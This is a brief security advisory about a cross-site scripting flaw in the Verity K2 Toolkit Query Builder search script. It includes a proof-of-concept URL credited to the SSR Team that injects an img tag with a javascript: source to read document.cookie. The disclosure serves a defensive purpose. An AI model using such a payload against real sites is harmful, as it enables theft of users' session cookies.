• info
• discussion
• exploit
• solution
• references

Verity K2 Toolkit Query Builder Search Script Cross-Site Scripting Vulnerability

No exploit is required for this vulnerability.

The following Proof-Of-Concept was made available by SSR Team:

http://www.example.com/[search].jsp?[query]=><img src=javascript:alert(document.cookie)>